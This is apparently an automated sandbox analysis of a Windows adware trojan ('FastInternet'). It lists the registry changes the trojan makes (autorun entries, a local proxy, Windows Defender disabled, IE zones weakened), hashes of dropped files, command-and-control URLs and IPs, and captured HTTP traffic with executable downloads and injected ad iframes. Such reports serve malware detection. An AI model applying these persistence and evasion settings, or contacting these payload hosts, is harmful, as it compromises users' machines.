[HKCU\Software\Microsoft\FiddlerCore\Dynamic]
"Attached" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level"

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 03 00 00 00 29 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"UninstallString" = "%Program Files%\FastInternet\dotuninstall.exe"

[HKLM\SOFTWARE\dingdongde]
"dingdongde" = "ok"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"DisplayName" = "FastInternet"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 86 45 EB 66 3E C8 A8 2B E6 09 61 6D D9 65 B4"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"Publisher" = "Dotdo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"

"dutoauto" = "C:\a\wincheckfe.exe"

The Trojan modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cutoauto" = "C:\a\wincheckfe.exe"

"interpee" = "C:\a\internetport3.exe"

"autoauto" = "73581819.bat"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"rutoauto" = "73581819.bat"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
a632e8db250976257ee2e73d658ada12 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc13.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc13.tmp\inetc.dll
acc2b699edfea5bf5aae45aba3a41e96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc13.tmp\nsExec.dll
8614c450637267afacad1645e23ba24a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse6.tmp\FindProcDLL.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse6.tmp\System.dll
8614c450637267afacad1645e23ba24a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp8.tmp\FindProcDLL.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp8.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp8.tmp\inetc.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr10.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr10.tmp\inetc.dll
acc2b699edfea5bf5aae45aba3a41e96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr10.tmp\nsExec.dll
99f345cf51b6c3c317d20a81acb11012 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsvA.tmp\KillProcDLL.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsvA.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsvA.tmp\inetc.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nswE.tmp\System.dll
2df723b3cb50a002fca6e8c63a7a487f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\EG9650tGGrxO3Eyr78zW[1].exe
a632e8db250976257ee2e73d658ada12 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\vchk[1].exe
cb6a1aa1be943fd5aa85bd18708f759b c:\Program Files\FastInternet\app.exe
29ff2eda9ef60448c67860c675175072 c:\Program Files\FastInternet\dotuninstall.exe
42badc1d2f03a8b1e4875740d3d49336 c:\a\7za.exe
2df723b3cb50a002fca6e8c63a7a487f c:\a\EG9650tGGrxO3Eyr78zW.exe
b19e81fc91a71a7222e63ea4f09771af c:\a\FiddlerCore.dll
da9dbf01355305af60037cd13ccf2968 c:\a\getcap.exe
2943023b33bb769d64721d4edccbd00b c:\a\internetport3.exe
e703835506e5dab34f20b5b496a38f72 c:\a\wcheckf.exe
813d46d64e42bf222676084e12e2e80d c:\a\wincheckfe.exe
7988bca8dfaacb79579fd000a31e69cf c:\a\winonit.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 65536 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 258048 2528 2560 3.12403 3333d5ca3c163ed95562eb98d8231779

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 10
6e9a02e45ff743e1e4fadd370e2903eb
aba7046b8baa12b2f0d4c8e67c5ee5dc
870adaabb0d08155f2e2f0d0d5111c82
b8c773eb87a0e41fc08ac983d38eaae0
48423276abbd0ba36915f6c270ce2246
d433981901923cfc7761708c0a8c1bba
000b647a23034792225a3ab9da073d23
c9011de3725d8bff7315a68c4adbad5b
6f36ebfe9bcdb0e9ce78f8200cc42804
2c6ca3869994304875f192b610227269

URLs

URL IP
hxxp://dotdo.net/cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877; 81.17.31.2
hxxp://dotdo.net/act/bdcount.ini?uniqueid=EG9650tGGrxO3Eyr78zW&type=1&reg=73581819.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 81.17.31.2
hxxp://dotdo.net/act/uniqueEG9650tGGrxO3Eyr78zW.ini?rd=4 81.17.31.2
hxxp://dotdo.net/act/exesbununique/EG9650tGGrxO3Eyr78zW.exe 81.17.31.2
hxxp://dotdo.net/act/exevc/vchk.exe 81.17.31.2
hxxp://dotdo.net/act/txt/hho.txt 81.17.31.2
hxxp://dotdo.net/act/txt/uur.txt 81.17.31.2
hxxp://dotdo.net/act/txt/vv.txt 81.17.31.2
hxxp://dotdo.net/act/txt/vchk.txt 81.17.31.2
hxxp://dotdo.net/ckkk.html 81.17.31.2
hxxp://dotdo.net/ckkkp.html 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/uur.txt 81.17.31.2
hxxp://dotap.dotdo.net/act/bdcount.ini?uniqueid=EG9650tGGrxO3Eyr78zW&type=1&reg=73581819.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 81.17.31.2
hxxp://dotap.dotdo.net/act/exesbununique/EG9650tGGrxO3Eyr78zW.exe 81.17.31.2
hxxp://dotap.dotdo.net/act/exevc/vchk.exe 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/vchk.txt 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/hho.txt 81.17.31.2
hxxp://dotap.dotdo.net/act/uniqueEG9650tGGrxO3Eyr78zW.ini?rd=4 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/vv.txt 81.17.31.2
fp0.dotdo.net 109.123.123.124


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send html content
SURICATA STREAM SHUTDOWN RST invalid ack
SURICATA STREAM Packet with invalid ack

Traffic

GET /act/txt/hho.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:25 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 4084
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
VVV.later-download.com.later-download.com.VVV.evodownload.com.evodownl
oad.com.cdn.castplatform.com.m3.zlvijp.com.zonealarm.com.VVV.zonealarm
.com.download.zonealarm.com.VVV.malwarebytes.org.malwarebytes.org.d.in
stashareonline.com.instashareonline.com.VVV.instashareonline.com.cdn.o
ptimizely.com.fp114.digitaloptout.com.VVV.superfish.com.superfish.com.
static.scanscout.com.z7hcp7lnkxu.st31g1duz2.com.ads.pubmatic.com.f-sec
ure.com.VVV.f-secure.com.gripdownload.co.d.jazzedcdn.com.VVV.gripdownl
oad.co.360safe.com.VVV.360safe.com.comodo.com.VVV.comodo.com.personalf
irewall.comodo.com.comodo-internet-security.en.softonic.com.srv.quikdi
splay.com.VVV.dimtron.com.dimtron.com.d.gettvwizard.com.d.instashareon
line.com.instashareonline.com.VVV.instashareonline.com.apiboxrockinfo-
a.akamaihd.net.b3.playfizz.com.apitechgilenet-a.akamaihd.net.d2d6i1lej
l34hs.cloudfront.net.jelly.hatonafish.com.nps.donutleads.com.app.donut
leads.com.istatic.datafastguru.info.pstatic.datafastguru.info.static.d
atafastguru.info.datafastguru.info.VVV.datafastguru.info.jsgnr.datafas
tguru.info.cdn.sharedaddomain.com.VVV.sharedaddomain.com.cdn.sharedadd
omain.com.besttv39.cdn.it.best-tv.com.nps.donutleads.com.VVV.donutlead
s.com.donutleads.com.securepaths.com.VVV.securepaths.com.upgrade-softw
are.org.VVV.upgrade-software.org.nps.pastaleads.com.pastaleads.com.www
.pastaleads.com.app.pastaleads.com.74faa29e28b0e.com.VVV.74faa29e28b0e
.com.VVV.safedownloadsrus108.com.safedownloadsrus108.com.VVV.v4downloa
d.com.v4download.com.VVV.v4download2.biz.v4download2.biz.VVV.4fbd0

<<< skipped >>>

GET /act/txt/uur.txt HTTP/1.1

User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:25 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 2093
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
kds.adspirit.de/adscript.php?pid=133&ord=[timestamp]..VVV.download.cne
t.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html..download.cn
et.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html..VVV.filehi
ppo.com/download_malwarebytes_anti_malware..filehippo.com/download_mal
warebytes_anti_malware..majorgeeks.com/files/details/malwarebytes_anti
_malware.html..VVV.majorgeeks.com/files/details/malwarebytes_anti_malw
are.html..VVV.microsoft.com/en-us/download/confirmation.aspx?id=9905..
microsoft.com/en-us/download/confirmation.aspx?id=9905..ads.pubmatic.c
om/AdServer/js/showad.js..download.cnet.com/Comodo-Internet-Security-P
remium/3000-2239_4-10460704.html..filehippo.com/download_comodo..VVV.f
ilehippo.com/download_comodo..VVV.tomsguide.com/us/download/Comodo-Ant
ivirus-Firewall-internet-security,0301-6605.html..tomsguide.com/us/dow
nload/Comodo-Antivirus-Firewall-internet-security,0301-6605.html..VVV.
pcmag.com/article2/0,2817,2457135,00.asp..pcmag.com/article2/0,2817,24
57135,00.asp..ads.pubmatic.com/AdServer/js/showad.js..b.scorecardresea
rch.com/beacon.js..d.gettvwizard.com/l/load.js..d.instashareonline.com
/l/load.js..apiboxrockinfo-a.akamaihd.net/gsrs?is=EF23DDUS&bp=PB3&g=a6
36a08d-c0be-4314-b676-974f8a821dce..VVV.filehippo.com/download_malware
bytes_anti_malware..filehippo.com/download_malwarebytes_anti_malware..
VVV.filehippo.com/download_malwarebytes_anti_malware/59476..filehippo.
com/download_malwarebytes_anti_malware/59476..origin.languages.malware
bytes.org/downloads/..download.cnet.com/Malwarebytes-Anti-Malware/

<<< skipped >>>

GET /act/txt/vv.txt HTTP/1.1

User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:26 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
5d26..all;;;;;;;;;;;<div class="mapAndAttrs">;;;;;;;;;;;<div 
class="mapAndAttrs"><iframe width="300" height="250" scrolling=n
o frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.do
tdo.net/adss/indexR.php?size=300x250 id="ddttttr"></iframe>..
all;;;;;;;;;;;<button class="reply_button js-only">;;;;;;;;;;;&l
t;br><iframe width="728" height="90" scrolling=no frameborder=0
scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/ind
exR.php?size=728x90 id="ddttttr"></iframe><br><butto
n class="reply_button js-only">..all;;;;;;;;;;;<header class="bc
head">;;;;;;;;;;;<br><iframe width="728" height="90" scrol
ling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://a
dss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe&
gt;<br><header class="bchead">..all;;;;;;;;;;;<ul class
="clfooter">;;;;;;;;;;;<br><iframe width="728" height="90"
scrolling=no frameborder=0 scrolling=no allowtransparency=true src=ht
tp://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></i
frame><br><ul class="clfooter">..kds.adspirit.de;;;;;;;
;;;;top.location.href;;;;;;;;;;;abcd..installpath.com;;;;;;;;;;;<di
v style="margin:0 auto; width:320px; height:270px;">;;;;;;;;;;;<
iframe width="850" height="480" scrolling=no frameborder=0 scrolling=n
o allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexRB.php?a=
11 id="ddttttr"></iframe>..VVV.installpath.com;;;;;;;;;;;

<<< skipped >>>

GET /ckkk.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:42 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT
ETag: "1d6000000029282-91-50a497515eff0"
Accept-Ranges: bytes
Content-Length: 145
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>..<head>..<title>Untitled</title>..<
/head>..<body>..</body>..</html>..HTTP/1.1 200 OK
..Date: Fri, 28 Aug 2015 06:51:42 GMT..Server: Apache/2.2.22 (Win64) P
HP/5.3.13..Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT..ETag: "1d6000
000029282-91-50a497515eff0"..Accept-Ranges: bytes..Content-Length: 145
..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type
: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitio
nal//EN">..<html>..<head>..<title>Untitled</ti
tle>..</head>..<body>..</body>..</html>..font>....


GET /act/txt/vchk.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:26 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
2990..mpck_gb_26.exe.upmpck_gb_26.exe.LuckyTab.exe.MaxComputerCleaner_
Maintenance.exe.ospd_us_1080.exe.upmbot_gb_571.exe.Setup_product_26943
.exe.SwiftRecord.expext.exe.SwiftRecord.BOASHelper.exe.SwiftRecord.BOA
SPRT.exe.SwiftRecord.BOAS.exe.SwiftRecord.BrowserAdapter.exe.TriplePos
e.expext.exe.TriplePose.BOASHelper.exe.TriplePose.BOASPRT.exe.TriplePo
se.BOAS.exe.TriplePose.BrowserAdapter.exe.FragileFixer.expext.exe.Frag
ileFixer.BOASHelper.exe.FragileFixer.BOASPRT.exe.FragileFixer.BOAS.exe
.FragileFixer.BrowserAdapter.exe.SimpleforYou.expext.exe.SimpleforYou.
BOASHelper.exe.SimpleforYou.BOASPRT.exe.SimpleforYou.BOAS.exe.Simplefo
rYou.BrowserAdapter.exe.Hatchiho.expext.exe.Hatchiho.BOASHelper.exe.Ha
tchiho.BOASPRT.exe.Hatchiho.BOAS.exe.Hatchiho.BrowserAdapter.exe.Mount
ainBike.expext.exe.MountainBike.BOASHelper.exe.MountainBike.BOASPRT.ex
e.MountainBike.BOAS.exe.MountainBike.BrowserAdapter.exe.EduApp.expext.
exe.EduApp.BOASHelper.exe.EduApp.BOASPRT.exe.EduApp.BOAS.exe.EduApp.Br
owserAdapter.exe.innoApp.expext.exe.innoApp.BOASHelper.exe.innoApp.BOA
SPRT.exe.innoApp.BOAS.exe.innoApp.BrowserAdapter.exe.SpecialBox.expext
.exe.SpecialBox.BOASHelper.exe.SpecialBox.BOASPRT.exe.SpecialBox.BOAS.
exe.SpecialBox.BrowserAdapter.exe.BetweenLines.expext.exe.BetweenLines
.BOASHelper.exe.BetweenLines.BOASPRT.exe.BetweenLines.BOAS.exe.Between
Lines.BrowserAdapter.exe.EnhanceTronic.expext.exe.EnhanceTronic.BOASHe
lper.exe.EnhanceTronic.BOASPRT.exe.EnhanceTronic.BOAS.exe.EnhanceTroni
c.BrowserAdapter.exe.MetalMaker.expext.exe.MetalMaker.BOASHelper.e

<<< skipped >>>

GET /cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877; HTTP/1.1
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:22 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 11
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
...googgood


GET /act/bdcount.ini?uniqueid=EG9650tGGrxO3Eyr78zW&type=1&reg=73581819.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:24 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
[a]..v=6....



GET /act/uniqueEG9650tGGrxO3Eyr78zW.ini?rd=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:24 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
[a]..v=yes....



GET /act/exesbununique/EG9650tGGrxO3Eyr78zW.exe HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:24 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Tue, 26 May 2015 16:50:52 GMT
ETag: "100000000026a66-dfa3-516feede835a3;509b7b7bbf620"
Accept-Ranges: bytes
Content-Length: 57251
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/x-msdownload

GET /ckkkp.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:49 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Sat, 29 Nov 2014 11:40:35 GMT
ETag: "100000000026c77-9f-508fdd8811aa8"
Accept-Ranges: bytes
Content-Length: 159
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>....<mamoba>..</body>..</html>....


GET /act/exevc/vchk.exe HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:25 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Wed, 19 Aug 2015 17:31:58 GMT
ETag: "16a000000026349-ddb0-51dad696a4296"
Accept-Ranges: bytes
Content-Length: 56752
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload

The Trojan connects to the servers at the following location(s):

wincheckfe.exe_1676:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
